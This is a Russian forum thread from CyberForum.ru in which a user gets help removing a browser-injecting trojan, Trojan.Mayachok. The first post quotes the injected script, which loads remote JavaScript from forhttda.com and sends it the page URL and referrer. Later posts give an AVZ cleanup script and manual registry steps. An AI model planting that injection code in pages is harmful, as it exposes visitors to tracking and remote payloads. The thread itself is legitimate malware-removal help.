Форум программистов, компьютерный форум CyberForum.ru
CyberForum.ru - форум программистов и сисадминов > > >
Восстановить пароль Регистрация
 
ashma
Новичок
0 / 0 / 0
Регистрация: 31.07.2012
Сообщений: 4
31.07.2012, 14:08     браузерный вирус   #1
Здравствуйте.
Поймал интересный вирус.

Вирус прописал адреса в файле хост ( как здесь: speedbar - вирус )

Браузеры не грузили страницы. Почистил файл хост, нашел и удалил вирусные файлы (taskhost.exe он назывался / лежал в appdata). Также почистил реестр и автозагрузку, связанные параметры с этим плохим файлом. Проверил компьютер на вирусы (нод / и CureIT в безопасном режиме). Все вроде хорошо.

Но ни одни из браузеров (4 браузера) не открывают нормально сайты в интернете. То подвисают сильно, то просто не могут открыть страницы, то еле еле грузят - через раз все. А еще на некоторых сайтах появляются всплывающие окна - там где не должно быть таких окон тоже.

Посмотрев исходные коды страниц, я увидел что в каждом из браузеров в конце страницы подписывается такой код (даже сейчас на вашем сайте), но почему-то этот код не грузится на сайтах поисковиков:
Код HTML5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<script type="text/javascript">
/* <![CDATA[ */
 
$(document).ready(function(){ 
rcmail.init();
var images = ["skins\/litecube-f\/images\/icons\/folders.png","skins\/litecube-f\/images\/mail_footer.png","skins\/litecube-f\/images\/taskicons.gif","skins\/litecube-f\/images\/display\/loading.gif","skins\/litecube-f\/images\/pagenav.gif","skins\/litecube-f\/images\/mail_toolbar.png","skins\/litecube-f\/images\/searchfield.gif","skins\/litecube-f\/images\/messageicons.png","skins\/litecube-f\/images\/icons\/reset.gif","skins\/litecube-f\/images\/abook_toolbar.png","skins\/litecube-f\/images\/icons\/groupactions.png","skins\/litecube-f\/images\/watermark.png"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
/* ]]> */
</script>
 
<script>var gtl=self;if ( gtl == top ){document.write("<script src='http" + (("https:" == document.location.protocol) ? "s" : "") +"://forhttda.com/phpbb/js.php?ran="+encodeURIComponent("PtZs4fMZvs2bDhOQ3O1fG8S6hmdrZ9RNo5oVSpdox3OkHk1QosJbKivyrSmD0bD1oMgFRfj9e2g_")+"&t=stat&u="+escape(document.URL)+"&r="+escape(document.referrer)+"&v=35101&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script>
Также, для примера, вообще не грузятся сайты мэйл ру, в контакте,одноклассники, яндекс через раз..

не знаю что делать, как убрать это.. помогите, пожалуйста, советом
AdAgent
Объявления
31.07.2012, 14:08     браузерный вирус
ashma
Новичок
0 / 0 / 0
Регистрация: 31.07.2012
Сообщений: 4
31.07.2012, 14:28  [ТС]     браузерный вирус   #3
я не могу скачать нужные программы для анализа, не могу прикреплять файлы... вирус мне просто не дает этого делать ни в одном брауезере. я бы рад, но ни как.. и другого компьютера рядом нет

Еще при попытке обновить браузеры на офф сайтах - грузится страничка о том, что в вашем браузере обнаружен вирус, чтоб обновить введите номер телефона для получения бесплатной смс с кодом для подтверждения что вы не робот. Причем текст одинаков совершенно на всех офф сайтах браузеров ( мозилла, эксплоир, опера). Домены в бразерной строке верные. Скрипт также не дает мне ходить по офф сайтам браузеров, всегда подгружая страничку о том что необходимо обновить браузер, так как он заражен.
Katharsis
Заблокирован
31.07.2012, 14:44     браузерный вирус   #4
отсюда сможете взять?

загрузить логи в крайнем случае можно на любой файлообменник
ashma
Новичок
0 / 0 / 0
Регистрация: 31.07.2012
Сообщений: 4
01.08.2012, 10:50  [ТС]     браузерный вирус   #5
сделал логи, пришлось воспользоваться другим компьютером для загрузки файлов
Вложения
Тип файла: rar info.rar (6.3 Кб, 37 просмотров)
Тип файла: rar log.rar (8.3 Кб, 17 просмотров)
Тип файла: zip virusinfo_syscheck.zip (30.6 Кб, 29 просмотров)
Тип файла: zip virusinfo_syscure.zip (31.7 Кб, 14 просмотров)
AdAgent
Объявления
01.08.2012, 10:50     браузерный вирус
Katharsis
Заблокирован
01.08.2012, 14:34     браузерный вирус   #6
не имею технической возможности посмотреть ваши логи, подождите, ответит другой специалист
shestale
Модератор
Вирусоборец
6633 / 2584 / 109
Регистрация: 22.02.2011
Сообщений: 7,944
01.08.2012, 14:46     браузерный вирус   #7
Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
Если у вас похожая проблема - создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1. Закройте все программы, отключите антивирус, файрволл и прочее защитное ПО.

AVZ, меню Файл - Выполнить скрипт - Скопировать ниже написанный скрипт-Нажать кнопку Запустить.
Код Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Windows\system32\hvtdpdj.dll','');
 QuarantineFile('C:\Windows\System32\SearchProtocolHost.exe','');
 QuarantineFile('C:\Windows\system32\4502.tmp','');
 DeleteFile('C:\Windows\system32\4502.tmp');
 DeleteFile('C:\Windows\system32\hvtdpdj.dll');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
RegKeyStrParamWrite('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','AutoCreateQuarantine', '"' + GetAVZDirectory + 'avz.exe' + '"' + ' Script=' + '"' + GetAVZDirectory + 'Script.txt' + '"');
AddLineToTxtFile(GetAVZDirectory + 'Script.txt', 'begin'+#13#10+' CreateQurantineArchive(GetAVZDirectory' + ' + ' + Chr(39) + 'quarantine.zip' + Chr(39) + ');'+#13#10+' RegKeyParamDel('+Chr(39)+'HKEY_CURRENT_USER'+Chr(39) + ', ' +Chr(39)+'SoftwareMicrosoftWindowsCurrentVersionRun'+Chr(39)+ ', '+Chr(39)+'AutoCreateQuarantine'+Chr(39)+');'+#13#10+' ExecuteFile('+Chr(39)+'explorer.exe'+Chr(39) + ', ' + 'GetAVZDirectory, 1, 0, false);'+#13#10+' ExitAVZ;'+#13#10+'end.');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU',2,3,true);
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится!

2. Полученный архив quarantine.zip из папки с AVZ, отправьте с помощью этой формы или на этот почтовый ящик: quarantine<at>safezone.cc (замените <at> на @), укажите ссылку на тему и ник на форуме.

3. Сделайте лог SecurityCheck by screen317

4. Скачайте Malwarebytes' Anti-Malware или с зеркала, установите, обновите базы, выберите "Perform Full Scan" ("Полное сканирование"), нажмите "Scan" ("Сканирование"), после сканирования - Ok - Show Results ("Показать результаты") - Откройте лог, скопируйте в блокнот и прикрепите его к следующему посту.
Если базы MBAM в автоматическом режиме обновить не удалось, обновите их отдельно. Загрузить обновление MBAM.

5. Повторите логи AVZ и Rsit и прикрепите их к сообщению.
ashma
Новичок
0 / 0 / 0
Регистрация: 31.07.2012
Сообщений: 4
01.08.2012, 15:16  [ТС]     браузерный вирус   #8
Спасибо за помощь.
Пока ждал ответа, сам разобрался.

Удалил остатки вирусов:

Встречается разновидность - trojan.mayachok.550.

Что представляет собой Trojan.Mayachok.1 (он же trojan.win32.ddox.ci, trojan.win32.cidox, trojan.win32.zapchast.feh, trojan:Win32/Vundo.OD, trojan.Win32.Mondere, trojan.Generic.KDV.169924)? По описаниям ресурса Dr.Web, это:


Цитата
Троянец, который крадет средства со счетов клиентов мобильных операторов, предлагая пользователям ответить на входящее СМС-сообщение.


Trojan.Mayachok.1 это файл .dll - динамически подключаемая библиотека, которая после установки загружается в адресное пространство памяти всех запущенных процессов (процесс установки заканчивается форсированной перезагрузкой компьютера), поэтому при сканировании системы антивирусом в нормальном режиме троянец часто видится пользователю как бы "сидящим внутри" различных файлов и "перемещающимся" из одного файла в другой. Может сложиться впечатление что Trojan.Mayachok.1 заражает файлы, но на самом деле это не так.

Что происходит после заражения? Описание повадок зловреда на сайте Dr.Web достаточно подробное поэтому не будем повторяться, от себя только добавлю что чаще всего пострадавший сталкивается со следующими проблемами:

// Подменой запрашиваемых страниц на "internet.com" "Ростелеком. Канал перегружен", "Подтвердите принадлежность аккаунта" и подобных;

// Полной невозможностью выйти в интернет при помощи любого браузера, или вместо нормальной загрузки сайта открытие страниц происходит в виде, напоминающем исходный код;

// Блокировкой запуска различных программ в нормальном режиме, в безопасном, как правило всё работает.

Итак, выяснили, у нас действительно Trojan.Mayachok.1 Как лечить? Нет смысла скачивать большое количество разнообразного антивирусного софта и тратить время на многочасовые проверки в надежде что поможет хоть что-то из этого - ни одно, так другое. Такая вероятность есть, но в некоторых случаях троянец хоть и определяется антивирусом, но оказывается ему не по зубам - при следующих проверках мы видим его снова и снова. Не стоит отчаиваться, всё на самом деле очень просто:

1. Открываем редактор реестра: нажимаем "Пуск" => "Выполнить" вписываем команду: regedit, нажимаем enter. Далее находим ветку:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
и параметр AppInit_DLLs

Смотрим значение этого параметра. Если видим запись, подобную этой:
"AppInit_DLLs" = "C:\windows\system32\tvhihgf.dll"

(кроме tvhihgf.dll имя файла может состоять семи из любых других латинских букв) - удаляем ее (имя файла запомните или запишите, чтобы потом легко его найти). Сам параметр AppInit_DLLs при этом оставляем, убираем только значение.

Ошибочные действия при правке реестра могут серьезно повредить систему!

----------------------------

а вот шаблон страницы, подгружаемой вирусом, не нашел, благодаря Вам также удалил плохую страницу.

Спасибо!

Добавлено через 4 минуты
И скрипт тоже выполнил. Полученный архивы и логи делаю, отправлю на указанную почту.
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
01.08.2012, 16:13     браузерный вирус
Еще ссылки по теме:

Браузерный вирус
Браузерный вирус
Как узнать все что делает этот вирус? (Осторожно в архиве вирус! *.exe)
akok
Форумчанин
Вирусоборец
3005 / 1039 / 15
Регистрация: 01.09.2009
Сообщений: 720
01.08.2012, 16:13     браузерный вирус   #9
Не факт. Букет болезней еще никто не отменял. Прошу, выполняйте рекомендации без самодеятельности или мы прекратим оказывать вам помощь.
Yandex
Объявления
01.08.2012, 16:13     браузерный вирус
После регистрации реклама в сообщениях будет скрыта и будут доступны все возможности форума.
Опции темы

Текущее время: 23:51. Часовой пояс GMT +4.
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.7 PL3
Copyright ©2000 - 2014, vBulletin Solutions, Inc.
Яндекс.Метрика